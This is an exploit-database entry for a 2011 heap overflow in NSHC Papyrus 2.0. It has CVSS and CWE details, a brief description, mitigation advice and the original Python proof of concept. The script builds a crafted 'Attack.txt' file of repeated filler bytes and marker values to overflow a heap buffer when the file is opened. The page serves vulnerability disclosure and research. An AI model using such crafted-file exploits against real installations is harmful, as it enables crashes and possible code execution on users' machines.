header-logo
Suggest Exploit
vendor:
Papyrus
by:
wh1ant
7.8
CVSS
HIGH
Heap Overflow
122
CWE
Product Name: Papyrus
Affected Version From: 2
Affected Version To: 2
Patch Exists: YES
Related CWE: N/A
CPE: a:nshc:papyrus:2.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP SP3 South Korea / Windows XP SP3 English VMware Workstation
2011

NSHC Papyrus Heap Overflow Vulnerability

This vulnerability is a heap overflow in NSHC Papyrus software. It is triggered when a specially crafted file is opened, causing a buffer overflow. The overflow occurs when the program attempts to write data to a buffer on the heap, which is larger than the allocated size. This can lead to arbitrary code execution.

Mitigation:

The best way to mitigate this vulnerability is to ensure that the software is up to date and patched with the latest security updates. Additionally, users should be aware of the potential risks of opening files from untrusted sources.
Source

Exploit-DB raw data:

#!/usr/bin/python
# 
# Title: NSHC Papyrus Heap Overflow Vulnerability 
# Date: 13\08\2011 
# Author: wh1ant
# Software Link: http://file.atfile.com/ftp/data/03/PapyrusSetup.exe
# Version: 2.0 
# Tested On: windows XP SP3 South Korea / windows XP SP3 English VMware Workstation
# CVE: N/A 
# Notice:
# Encrypt/Decrypt programs that are created by NSHC
#
 
fd = open("Attack.txt", "w")
data = 'A'
for i in range(0, 1003):
 fd.write(data)
fd.write("BBBB");
fd.write("CCCC");
for i in range(0, 2000):
 fd.write(data);
fd.close()